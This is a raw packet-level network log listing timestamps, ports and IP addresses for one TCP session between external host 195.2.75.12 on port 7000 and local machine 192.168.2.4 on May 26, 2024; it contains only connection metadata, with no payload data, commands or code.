May 26, 2024 01:21:26.600769043 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.600846052 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.601109028 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.601145983 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.601180077 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.601207972 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.601660967 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.601838112 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.601890087 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.602092981 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.602166891 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.602303982 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.602339983 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.602401972 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.602583885 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.602623940 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.602680922 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.602948904 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.630225897 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.630253077 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.630326986 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.630367041 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.630506992 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.630506992 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.630506992 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.630682945 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.630701065 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.630753040 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.630809069 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.631433010 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.631634951 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.634569883 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.634900093 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.634923935 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.634942055 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.634959936 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.635099888 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.635160923 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.635162115 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.635162115 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.635261059 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.635509014 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.635617971 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.635740995 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.636347055 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.636378050 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.636435032 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.636873960 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.636948109 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.637053967 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.637130022 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.637291908 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.637304068 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.638017893 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.638056993 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.638097048 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.638111115 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.638169050 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.638560057 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.638653040 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.638925076 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.638987064 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.639508963 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.639543056 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.639578104 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.639609098 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.639640093 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.639990091 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.640098095 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.640161991 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.640300035 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.640445948 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.640783072 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.640841007 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.640882015 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.640940905 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.641427040 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.641566038 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.641690016 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.641746998 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.642195940 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.642257929 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.650433064 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.650583029 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.650823116 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.666995049 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.667058945 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.667237997 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.668499947 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.668664932 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.669137955 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.669173956 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.669208050 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.669310093 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.669311047 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.671526909 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.671636105 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.671730042 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.671760082 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.671842098 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.671885014 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.671921015 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.672487020 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.672575951 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.672585011 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.672642946 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.672749996 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.673249960 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.673356056 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.673398972 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.673522949 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.673582077 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.673991919 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.674109936 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.674146891 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.674206972 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.676515102 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.676551104 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.676605940 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.676790953 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.676826954 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.676848888 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.676862001 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.677216053 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.677249908 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.677273989 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.677287102 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.677329063 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.677330017 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.677366972 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.677432060 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.677861929 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.677895069 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.677925110 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.678237915 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.678273916 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.678334951 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.678633928 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.678715944 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.678767920 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.678893089 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.679064989 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.679128885 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.679526091 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.679562092 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.679622889 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.682058096 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.682157993 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.695099115 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.695245981 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.695286036 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.695321083 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.695358992 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.695393085 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.695442915 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.695478916 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.695487022 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.695535898 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.695550919 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.695550919 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.695570946 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.695605040 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.695641041 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.695674896 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.695807934 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.695807934 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.696239948 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.696345091 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.696377039 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.696419001 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.696455002 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.696489096 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.696517944 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.696557045 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.696990967 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.697268963 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.697304964 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.697344065 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.697371960 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.697400093 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.697405100 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.698111057 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.698147058 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.698245049 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.699717999 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.699754953 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.699795961 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.721257925 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.721698999 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.721808910 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.722183943 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.722531080 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.722922087 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.722939968 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.723171949 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.724317074 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.725553989 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.725570917 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.725774050 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.725928068 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.726128101 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.726648092 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.726665020 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.726735115 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.727379084 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.727396011 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.727464914 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.728389978 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.728405952 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.728457928 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.729553938 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.730099916 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.730118036 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.730173111 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.731240988 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.731259108 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.731316090 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.732393026 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.732412100 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.732426882 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.732466936 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.732498884 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.733530045 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.733547926 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.733639002 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.734926939 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.734942913 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.735013962 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.735755920 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.735773087 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.735785961 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.735843897 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.736795902 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.736812115 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.736865997 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.737683058 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.737700939 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.737716913 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.737752914 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.737785101 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.738713980 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.738749981 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.738821983 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.739779949 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.739818096 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.739850998 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.739878893 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.740561008 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.740597010 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.740677118 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.741611004 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.741681099 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.759232998 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.759582043 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.759691954 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.759922028 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.760135889 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.760319948 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.760620117 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.761131048 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.762624025 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.762645006 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.762820005 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.762820005 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.762866974 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.763782024 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.763887882 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.764023066 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.764432907 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.764749050 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.764857054 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.765258074 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.765275955 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.765321970 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.766021967 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.766038895 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.766092062 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.766805887 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.766860962 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.767230034 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.767246008 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.767261982 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.767318964 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.768081903 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.768099070 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.768182993 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.769062996 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.769123077 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.769237995 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.769257069 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.769361019 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.770535946 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.770553112 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.770567894 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.770585060 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.770626068 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.770673037 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.771277905 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.771296024 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.771349907 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.772075891 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.772094011 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.772175074 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.773082972 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.773101091 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.773174047 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.775286913 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.775304079 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.775363922 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.775369883 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.775382996 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.775399923 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.775451899 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.779151917 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.779393911 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.779464006 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.779577971 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.779578924 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.779700994 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.780124903 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.780330896 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.782748938 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.785520077 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.785839081 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.786005020 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.786003113 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.786087990 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.786233902 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.786909103 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.786926985 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.786994934 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.787009954 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.787072897 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.787167072 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.787488937 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.787548065 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.787792921 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.788291931 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.788307905 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.788367987 CEST	49730	7000	192.168.2.4	195.2.75.12
